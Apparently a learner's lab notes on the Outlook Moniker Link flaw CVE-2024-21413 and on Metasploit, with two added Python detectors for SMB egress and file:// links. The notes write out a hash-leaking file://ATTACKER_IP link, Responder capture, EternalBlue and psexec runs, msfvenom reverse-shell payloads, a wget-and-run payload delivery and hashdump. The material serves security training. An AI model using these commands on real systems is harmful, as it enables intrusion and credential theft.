-------------Moniker Link (CVE-2024-21413)--------------------------
A Moniker Link:- a special kind of hyperlink that points not to a website (like
https://...) but to a file or application on a system
The file:// protocol → Accesses local or shared files
The Windows Component Object Model (COM) → Lets Windows open/launch
applications or resources via URL
Example Moniker Link:
<a href="file://ATTACKER_IP/somefile">Click me</a>
When this link is clicked:
Outlook tries to fetch the file from the remote server
This uses the SMB (Server Message Block) protocol
During the request, the victim's Windows credentials (NTLM hash) are
automatically sent to the remote SMB server
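A network-side check for the leak just described, added here as an example (it is not part of the original notes): a client that follows a file://ATTACKER_IP/... link opens an SMB connection to a host outside the internal network, so outbound TCP/445 or TCP/139 to non-RFC 1918 addresses is the signal to look for. The key=value log format, the addresses and the internal ranges are all constructed assumptions; 203.0.113.5 is a documentation address standing in for the remote SMB host.

```python
import ipaddress

# Constructed connection-log lines (hypothetical, not from the original notes).
# Format: <timestamp> src=<ip> dst=<ip> dport=<port> proto=<tcp|udp>
LOG_LINES = [
    "2024-02-14T09:12:01Z src=10.10.12.50 dst=10.10.12.20 dport=445 proto=tcp",
    "2024-02-14T09:12:07Z src=10.10.12.50 dst=203.0.113.5 dport=445 proto=tcp",
    "2024-02-14T09:12:09Z src=10.10.12.50 dst=203.0.113.9 dport=443 proto=tcp",
    "2024-02-14T09:12:11Z src=10.10.12.51 dst=203.0.113.5 dport=139 proto=tcp",
]

# SMB listens on TCP/445 (and TCP/139 via the NetBIOS session service).
SMB_PORTS = {445, 139}

# Assumption: RFC 1918 space is "inside"; any other destination is external.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_line(line):
    """Split one log line into a dict; the first token is the timestamp."""
    ts, *pairs = line.split()
    fields = dict(p.split("=", 1) for p in pairs)
    fields["ts"] = ts
    fields["dport"] = int(fields["dport"])
    return fields


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def find_smb_egress(lines):
    """Return (timestamp, src, dst, dport) for SMB connections that leave the
    internal ranges. An Outlook client following a file://ATTACKER_IP/...
    link produces exactly this: an outbound SMB session carrying its NTLM
    authentication response."""
    hits = []
    for line in lines:
        f = parse_line(line)
        if (f["proto"] == "tcp" and f["dport"] in SMB_PORTS
                and not is_internal(f["dst"])):
            hits.append((f["ts"], f["src"], f["dst"], f["dport"]))
    return hits


if __name__ == "__main__":
    for hit in find_smb_egress(LOG_LINES):
        print("SMB egress:", hit)
```

Internal-to-internal SMB (the first line) and ordinary HTTPS egress (the third) are left alone; only the two SMB sessions to the external address are reported. In a real deployment the same rule is usually enforced rather than just detected, by blocking outbound 445/139 at the perimeter.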
To protect users, Outlook uses Protected View:
When you open emails with suspicious content (attachments, external links,
macros), it runs the email in a sandbox, disables macros, and blocks risky links
The Vulnerability (CVE-2024-21413)
Use a ! in the link:- <a href="file://attacker_ip/file!exploit">Click me</a>
This bypasses the protection, and Outlook proceeds to connect to the remote
server, sending the victim's NTLMv2 hash (a Windows password hash)
Exploitation:-
Responder is a tool used by attackers or penetration testers to:
Capture network authentication requests.
Steal password hashes (especially NTLM hashes).
Trick machines into authenticating with the attacker's machine, thinking
it's a legitimate network resource.
-> responder -I ens5
tells Responder to listen on interface ens5 (network adapter).
So if any Windows machine on the network tries to find a file share (SMB) or
misresolves a hostname, Responder tricks it into connecting to your machine,
and the machine sends you its NTLMv2 hash.
SMB - Server Message Block - lets computers on the same network:
Access shared files/folders
Use shared printers
Communicate for file-related services
SMB sends credentials (NTLM hashes) during access attempts.
Detection:-
YARA is a tool used to detect malware or suspicious patterns in files, emails,
memory, etc. It’s often used by malware analysts and security teams.
A YARA rule for this looks for emails containing:
file://
specifically when used inside a Moniker Link
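The same check the YARA rule above is described as doing, written out as an added example in Python (this is not the notes' rule and not Outlook's own logic): pull every href out of an email body and flag the ones that point at a file:// target, with a separate verdict when the target also carries the ! from the CVE-2024-21413 bypass. It goes slightly beyond the notes by also flagging UNC paths (\\host\share), which Windows resolves over SMB in the same way. The sample bodies are constructed; 203.0.113.5 is a documentation address.

```python
import re
from html.parser import HTMLParser

# Constructed sample email bodies (hypothetical, not from the original notes).
SAMPLES = {
    "benign": '<p>Report: <a href="https://intranet.example/report">open</a></p>',
    "moniker": '<a href="file://203.0.113.5/share/doc.docx">Click me</a>',
    "moniker_bang": '<a href="file://203.0.113.5/share/doc.docx!exploit">Click me</a>',
    "unc": '<a href="\\\\203.0.113.5\\share\\doc.docx">Click me</a>',
}


class _HrefCollector(HTMLParser):
    """Collects href values from <a> tags. HTMLParser takes care of attribute
    quoting and decodes character references (e.g. &#58; for ':'), so a
    lightly obfuscated scheme still reaches classify_href as plain text."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "a":
            return
        for name, value in attrs:
            if name.lower() == "href" and value:
                self.hrefs.append(value.strip())


def extract_hrefs(html):
    collector = _HrefCollector()
    collector.feed(html)
    return collector.hrefs


# A file: URL or a UNC path (\\host\share) makes Windows open the target over
# SMB; that is the Moniker Link shape the notes describe.
_FILE_SCHEME = re.compile(r"^file:", re.IGNORECASE)


def classify_href(href):
    """'ok' for ordinary web links, 'moniker-link' for file:// or UNC targets,
    'moniker-link-bang' when the target also carries the '!' that
    CVE-2024-21413 uses to get past Protected View."""
    if not (_FILE_SCHEME.match(href) or href.startswith("\\\\")):
        return "ok"
    return "moniker-link-bang" if "!" in href else "moniker-link"


def scan_email_html(html):
    """Return (verdict, href) pairs for every link that should be flagged."""
    findings = []
    for href in extract_hrefs(html):
        verdict = classify_href(href)
        if verdict != "ok":
            findings.append((verdict, href))
    return findings


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:13s} -> {scan_email_html(body)}")
```

Parsing the HTML rather than grepping the raw body is the point of the example: a plain substring match on file:// misses a link whose scheme is written with character references, while the parser hands back the decoded attribute value. Whether a plain file:// link (no !) is blocked or merely flagged is a policy choice; the ! variant is the one that bypasses Protected View and should always be treated as malicious.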
-----------------------------Metasploit-------------------------------
-> msfconsole
Metasploit is made of different modules, each designed for a specific task:
1. Auxiliary Modules: used for non-exploitation tasks like scanning, sniffing,
crawling, etc.
2. Encoders: used to encode payloads to bypass antivirus / obfuscate the code
3. Evasion: specifically to avoid AV/Defender detection
4. Exploits: the actual attack scripts
5. NOPs: padding used in shellcode (tells the CPU: "do nothing for a moment")
6. Payloads: what runs on the target (e.g. shell, user creation)
   Adapters: reformat payloads (e.g., into PowerShell).
   Singles: one-shot payloads; run immediately, no extra download.
   Stagers: set up a connection to download the main payload (like a platform
   to run the main payload (stages)).
   Stages: the main payload, downloaded and executed by the stager.
7. Post Modules: what you do after hacking (e.g. privilege escalation)
Commands:-
-msfconsole
-use exploit/windows/smb/ms17_010_eternalblue -> use a context exploit
-show options -> print options related to the exploit we have chosen
-show payloads
-info -> Further information on any module
-back -> to go back out of the current context
-search {name} -> search the Metasploit Framework database for modules
relevant to the given search parameter (e.g. search ms17-010)
Ranking of exploits
Excellent: Always works, never crashes (e.g., SQLi, RFI).
Great: Very reliable with version checks or app-specific logic.
Good: Works well on common/default setups (e.g., English Win7).
Normal: Works but version-specific, no auto-detect.
Average: Unreliable or difficult to exploit.
Low: Nearly impossible to exploit.
Manual: Unstable, difficult to exploit, mostly DoS or needs special setup to be
useful.
Parameters used often: (can be seen in "show options")
RHOSTS: “Remote host”, the IP address of the target system
RPORT: “Remote port”, the port on the target system the vulnerable application
is running on.
PAYLOAD: The payload you will use with the exploit.
LHOST: “Localhost”, the attacking machine (your AttackBox or Kali Linux) IP
address.
LPORT: “Local port”, the port you will use for the reverse shell to connect back
to. This is a port on your attacking machine, and you can set it to any port not
used by any other application.
SESSION: Each connection established to the target system using Metasploit will
have a session ID. You will use this with post-exploitation modules that will
connect to the target system using an existing connection.
-set rhost 10.10.10.212 -> sets the value in the current module/context
only; when you switch to another module, you need to set it again
-unset rhost / -unset all -> clear one parameter value, or all of them
-setg rhost 10.10.10.212 -> sets the value across all modules at once
-exploit -> once all module parameters are set, launch the module using the
exploit command (exploitation)
-exploit -z -> run the exploit and background the session as soon as it
opens.
Once a vulnerability has been successfully exploited, a session will be created
and the prompt changes to "meterpreter >".
The session is the communication channel established between the target system
and Metasploit.
-background -> to background the session prompt and go back to the msfconsole
prompt (also Ctrl+Z)
-sessions -to list active sessions
-sessions -i 2 -To interact with any session, use sessions -i command followed
by the desired session number.
-search portscan -> to list potential port scanning module
msf6 > nmap -sS 10.10.12.229 -> can run nmap cmds directly in this console
What is the "penny" user's SMB password? using smb_login module
-use smb_login
-show options
-set rhosts <target_ip>
-set SMBUser penny
-set PASS_FILE <pathtowordlist>
Metasploit has a database function to simplify project management and avoid
possible confusion when setting up parameter values.
Need to start the PostgreSQL database first: systemctl start postgresql
Initialize the Metasploit database using: msfdb init (if root: sudo -u
postgres msfdb init)
-msfconsole
-db_status
The database feature lets you create workspaces to isolate different
projects: workspace
Add a new workspace: workspace -a tryhackme (to delete: workspace -d)
workspace -h lists the available options for the workspace command.
If you run a Nmap scan using the db_nmap shown below, all results will be
saved to the database.
db_nmap -sV -p- 10.10.12.229
-hosts / -services -> to get relevant info related to the target
Once the host info is stored in the db, use hosts -R to add this value to the
RHOSTS parameter.
-services -S netbios -> search for specific services in the environment.
Exploit-
-use eternalblue
-show payloads
-set payload 2 (the number from the list we want)
-set lhost 10.10.248.82 (your IP)
-exploit
ctrl+z to run in background session
-sessions
-sessions -i 2 (session id from the list)
Msfvenom - Tool that helps:
Create malicious payloads (code that gives you control over a target).
Encode or obfuscate payloads.
Output payloads in different formats like .exe, .elf, .php, etc.
msfvenom replaced msfpayload & msfencode
Linux payload
-msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=4444
-f elf > shell.elf
-p -> the payload you want
-f -> the output format; > redirects the output into a file
Windows payload
-msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=4444 -f
exe > shell.exe
PHP payload
-msfvenom -p php/reverse_php LHOST=10.10.X.X LPORT=7777 -f raw >
reverse.php
EDIT the file so it starts with "<?php" and ends with "?>"
Python payload
-msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=8888 -f raw >
rev_shell.py
A handler listens for incoming connections from the payload.
-use exploit/multi/handler
-set payload linux/x64/meterpreter/reverse_tcp (set the same payload used
above)
-set LHOST 10.10.X.X
-set LPORT 4444
-run
1.Generate the PHP shell using MSFvenom
2.Start the Metasploit handler
3.Execute the PHP shell
STEP 1: Create the Malware File (called payload)
on attackbox
-msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4444 -f
elf > shell.elf
STEP 2: Share that File
on attackbox
-python3 -m http.server 9000
STEP 3: Login to the Target Machine
on target
-ssh
-sudo su (to become root)
STEP 4: Download the Malware on Target
on target
-wget http://YOUR_ATTACKBOX_IP:9000/shell.elf
-chmod +x shell.elf
STEP 5: Start Listener to Catch the Connection
on attackbox
-msfconsole
-use exploit/multi/handler
-set payload linux/x64/meterpreter/reverse_tcp
-set LHOST YOUR_ATTACKBOX_IP
-set LPORT 4444
-run
STEP 6: Run the Malware on Target
on target
-./shell.elf
STEP 7: Steal Password Hashes
on attackbox
-sessions
-sessions -i 1
-background
Run hash stealing tool
-use post/linux/gather/hashdump
-set SESSION 1
-run
METERPRETER
-is a Metasploit payload that runs on the target system and provides
powerful tools for pen testing and remote control.
It runs in memory and does not write itself to the disk on the target (i.e. not
installed, to avoid detection)
It also avoids detection by IPS & IDS by using encrypted (TLS) communication with
the server (attacker)
Many versions of Meterpreter exist; which to use depends on 3 factors:
1. target OS (Mac, Linux, Windows)
2. components available on the target system
3. network connection type with the target
When you use some exploits, Metasploit automatically adds a suitable payload
like Meterpreter. You can change it if needed, but it picks a smart default to
help you get started faster.
Different Meterpreter versions have different commands.
If you run the help command, you will see Meterpreter commands are listed under
different categories.
Core commands
File system commands
Networking commands
System commands
User interface commands
Webcam commands
Audio output commands
Elevate commands
Password database commands
Timestomp commands
Migrating to another process lets Meterpreter interact with it,
e.g. migrating to a word processor and capturing keystrokes
-migrate 715 (PID)
The hashdump command will list the content of the SAM database (which stores
users' passwords on Windows systems)
-hashdump
The search command is useful to locate files
-search -f flag.txt
The shell command will launch a regular command-line shell on the target system
-shell
To load additional tools
-load python / load kiwi etc...
Meterpreter-Exploit
-msfconsole
-use exploit/windows/smb/psexec
-set RHOSTS <Target_IP>
-set SMBUser ballen (given)
-set SMBPass Password1
-set PAYLOAD windows/meterpreter/reverse_tcp
-set LHOST <Your_Attacking_IP>
-exploit
then run required commands on the meterpreter console like
-sysinfo
-migrate pid
-search -f flag.txt etc
Windows blue exploiting
-nmap -sV -vv --script vuln target_ip
Got the open ports and vulnerability (EternalBlue, MS17-010)